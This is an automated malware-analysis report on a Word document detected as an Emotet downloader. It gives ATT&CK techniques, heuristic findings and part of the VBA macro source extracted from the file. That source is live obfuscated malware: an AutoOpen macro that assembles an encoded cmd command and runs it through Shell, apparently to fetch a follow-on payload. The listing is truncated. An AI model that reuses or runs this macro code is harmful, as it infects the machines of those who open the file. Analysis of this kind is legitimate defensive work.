Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The presence of an AutoOpen macro and the ClamAV detection 'Doc.Downloader.Emotet-6883985-0' strongly indicate this is an Emotet downloader. The VBA script uses AppActivate and Shell functions, suggesting an attempt to execute commands, likely to fetch and run a subsequent stage. The AutoOpen macro is a common initial execution vector for Emotet.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6883985-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883985-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6291 bytes |

SHA-256: 8d36498e92ec1223416510ce439027dbf21aa682376f1bba0f44967f93c398d6
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "jVAOlCKfKRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate Oct(pHQppj)
AppActivate Sqr(7)
AppActivate pNJhws
AppActivate 5709
AppActivate Chr(ohSrwK / TLiKzF + 99827 / YtSAzq)
Shell@ CVar("cm") + YKnRpHa + nEwXRlnkp + WcXWUTZRi + BjYdCWhUC + rQFUQkA + DRvXuLDBYLq + ViRGwjcHqXVNtS, 457951129 - 457951129
AppActivate 2
AppActivate CByte(9)
End Sub
Attribute VB_Name = "KZMstuwQ"
Function WcXWUTZRi()
On Error Resume Next
AppActivate CDate(nSutVt + 49052)
AppActivate Int(20667 * SLiir * RGfNFN * wuYQPj)
AppActivate CInt(23565 / fAVZmW)
YjiTYIOQz = "d /" + "V:/C" + CStr(Chr(VrMXJunYb + krSKqWChbqZ + 34 + mnpBCuzSUzBJq + kDqwjshQGp)) + "set 5a" + "=ZDshz" + "w" + "ETkhhq" + "UzvNnVNPBJ" + "zTsIaV\-$m" + "=Gd"
AppActivate 469332340
AppActivate Tan(mKnRz)
AppActivate Atn(siXCFi)
LZXfRYh = "o;gr3@M.C " + "QxuteF" + "/c'1L+W0" + "bSHpy,l" + "98j5):{" + "if}2" + "Y(&&for %A" + " in " + "(" + "62;35;5;" + "49;38;24"
AppActivate qBbAW
AppActivate CDbl(MDnuF)
BOcojGJVIa = ";10;" + "49;65;65;" + "44;30;45;6" + "1;" + "31;32;" + "16" + ";" + "49;5" + ";29;3" + "5;59;68;49" + ";52;48;44;" + "18;49;"
AppActivate CBool(602)
AppActivate Int(61982 * RYTua - HOzUXq / 72975)
BbfdEUTZsLF = "48;42;57;4" + "9;59" + ";43;65;73" + ";49;1" + "6;48;" + "36" + ";3" + "0;" + "10;74" + ";77;32;" + "53;10;48;4" + "8;6"
AppActivate 2
AppActivate 15
AppActivate Atn(MUbUGj * Xazir)
lRLqm = "2;71;51" + ";" + "51;" + "26;63;3" + "7;24" + ";65"
AppActivate Sin(48520 - ljaEJK)
AppActivate 266615983
AppActivate oFppdi
UrjZHHcbl = ";42;16;" + "49;48;51;" + "31;" + "55;74" + ";"
AppActivate Fix(kLrPX * kZXliv)
AppActivate 224602168
AppActivate 9
WEmucYJL = "40;10" + ";48;" + "48;62;" + "7" + "1;51;51;7" + "4;49;7" + "3;48;35" + ";24;26" + ";49;"
AppActivate Int(100110875)
AppActivate CByte(81784 * pfvJvU)
AppActivate CDate(519344421)
joFXDzj = "7" + "4" + ";47;68;7" + "3;4" + "8;26;42;2" + "6;34;14;42"
AppActivate CBool(5364)
AppActivate 51
THotfN = ";59;3" + "8;5" + "1;63;26;50" + ";8;40;" + "10;4"
AppActivate 146767995
AppActivate CStr(rqlMc)
afnRihf = "8;48;62;" + "71;51;51;" + "31;26;46" + ";35;4" + "7;48;" + "62;47;48;" + "42;5"
AppActivate CDate(88020 * BKDoa - 30927 / 10786)
AppActivate ChrB(85)
rbZRVD = "2" + ";3" + "5;4" + "2;" + "22;" + "26;51" + ";39;"
WcXWUTZRi = YjiTYIOQz + LZXfRYh + BOcojGJVIa + BbfdEUTZsLF + lRLqm + UrjZHHcbl + WEmucYJL + joFXDzj + THotfN + afnRihf + rbZRVD
AppActivate Log(222159915)
AppActivate Fix(vZpBv)
AppActivate dwBQQq
End Function
Function BjYdCWhUC()
On Error Resume Next
AppActivate Round(bwBYFw)
AppActivate 4
AppActivate Hex(18)
KzOqcqsXaqY = "40;10" + ";4" + "8;48;62;71" + ";5" + "1;5" + "1;46;16" + ";29;29;6" + "6" + ";58;26;" + "59;" + "49;37;5" + "9;4" + "8"
AppActivate Log(40)
AppActivate Hex(396916271)
whuqTquLcZ = ";48;62;68" + ";59;3" + "9;59;22;" + "59;76" + ";68;42;46" + ";16;29;" + "29" + ";62;" + "54;26;" + "73;51;2"
AppActivate CStr(65848 / wWjuM - 44738 - SirAzV)
AppActivate MjNniE
GzbkhP = "3" + ";19;8;" + "3" + "1;" + "33;49;4" + "3;45;" + "40" + ";10;48;48" + ";62;71;5" + "1;51" + ";5;5;5;42;"
AppActivate ChrW(11656 + QvCDPE)
AppActivate 1
MioiKNbszwh = "10;26" + ";24;49;8" + ";73;31" + ";" + "47;10;49" + ";16;34;73;" + "24;65;" + "73;8;42"
AppActivate Sqr(tKKBF)
AppActivate 86
AppActivate Log(29)
IGiKCzUpCF = ";5" + "2;35;3" + "1;51;46;5" + "5;5" + "3;42;60;" + "62;65;" + "73;48;7" + "8;53" + ";40;53;7" + "0;3"
AppActivate 192735355
AppActivate oIEjwI
wFqSCkCU = "6;30;4" + "1;2" + "0;20;44;32" + ";44;53;69" + ";67;6" + "6;53;36;3" + "0;1;1;" + "38" + ";32;3" + "0"
AppActivate SvFKL
AppActivate luBAbm
AppActivate ChrW(ovauw + ZPPndi * 82690 * ABYLi)
```

... (truncated)